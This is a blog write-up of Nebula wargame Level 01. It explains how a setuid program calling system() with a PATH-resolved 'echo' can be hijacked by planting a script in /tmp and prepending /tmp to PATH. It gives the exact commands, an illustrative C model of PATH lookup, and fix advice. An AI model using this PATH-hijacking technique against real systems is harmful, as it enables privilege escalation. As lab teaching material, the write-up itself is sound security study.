blog.ferling.eu by Benedikt Ferling


 

exploit-exercises.com/nebula -- Level 01

Problem

  1. Using functions that are known to be vulnerable!
  2. Read the manual!

The given program uses the C library function system(const char *command); to execute a command. According to www.gnu.org, this function runs the given command through /bin/sh -c. If a relative command name is used, /bin/sh -c searches the directories listed in the environment variable PATH for a command that matches that name. That means one can modify the PATH variable so that the program executes one's own implementation of the relatively named command. This custom command can be a shell script or a binary.
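To make that lookup rule concrete, here is an added example (not code from the level or from this blog) that models how /bin/sh picks a binary for a relative name by walking PATH, and adds the check a reviewer would want: is the directory that wins one that any local user can write to? The file list, the world-writable directory list and the function names resolve_in_path and resolved_dir_is_unsafe are constructed for the demo.

```c
#include <stdio.h>
#include <string.h>
/* Constructed stand-in for the filesystem: the only files that "exist". */
static const char *const g_files[] = { "/bin/echo", "/tmp/echo", NULL };
/* Constructed list of directories assumed to be world-writable. */
static const char *const g_writable[] = { "/tmp", "/var/tmp", NULL };

static int in_list(const char *const *list, const char *s) {
    for (int i = 0; list[i]; i++)
        if (strcmp(list[i], s) == 0) return 1;
    return 0;
}

/* Walk PATH left to right, as /bin/sh does for a relative command name; write
 * the first dir/name that exists into out and return its entry index, or -1. */
int resolve_in_path(const char *name, const char *path, char *out, size_t n) {
    char dir[256];
    for (int idx = 0; ; idx++) {
        const char *colon = strchr(path, ':');
        size_t len = colon ? (size_t)(colon - path) : strlen(path);
        if (len >= sizeof dir) len = sizeof dir - 1;
        memcpy(dir, path, len);
        dir[len] = '\0';
        snprintf(out, n, "%s/%s", dir[0] ? dir : ".", name); /* "" entry = cwd */
        if (in_list(g_files, out)) return idx;
        if (!colon) return -1;
        path = colon + 1;
    }
}

/* Defensive check on the directory that won: relative, "." or world-writable
 * means any local user can plant a file that a setuid caller will execute. */
int resolved_dir_is_unsafe(const char *resolved) {
    const char *slash = strrchr(resolved, '/');
    size_t len = slash ? (size_t)(slash - resolved) : 0;
    if (resolved[0] != '/') return 1;
    for (int i = 0; g_writable[i]; i++)
        if (strlen(g_writable[i]) == len && strncmp(g_writable[i], resolved, len) == 0)
            return 1;
    return 0;
}

int main(void) {  /* clean PATH yields /bin/echo, the poisoned one /tmp/echo */
    char hit[512];
    resolve_in_path("echo", "/usr/local/bin:/usr/bin:/bin", hit, sizeof hit);
    printf("clean    -> %s unsafe=%d\n", hit, resolved_dir_is_unsafe(hit));
    resolve_in_path("echo", "/tmp:/usr/local/bin:/usr/bin:/bin", hit, sizeof hit);
    printf("poisoned -> %s unsafe=%d\n", hit, resolved_dir_is_unsafe(hit));
    return 0;
}
```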

Exploit

Note line 17 of the program's source:

...
17    system("/usr/bin/env echo and now what?");
...

It uses system(const char *command); to execute the command /usr/bin/env echo and now what?. Since /usr/bin/env looks up echo through PATH, one can edit the environment variable PATH and run one's own echo. Create the file /tmp/echo with the following content:

#!/bin/bash
getflag

In addition, make the file executable and edit the PATH variable:

chmod +x /tmp/echo
PATH=/tmp:${PATH}

Executing the level's binary now runs our echo and yields the flag:

/home/flag01/flag01

Note

You can add any commands to the shell script; they will be run as user flag01.

Lesson / How to Fix

  1. Do not use functions that are known to be vulnerable! Using absolute paths will not help either; see linux.die.net, section Notes, for more details.
  2. Read the manual! As this wargame will show on other levels too, reading the documentation of the functions you use is essential if one wants to program with security in mind.

The intention of the program is not clear to me. A possible fix is to use printf with a fixed string and no user input, i.e. the string "/usr/bin/env echo and now what?". Accepting user input leads to other problems such as buffer overflows or format string vulnerabilities.

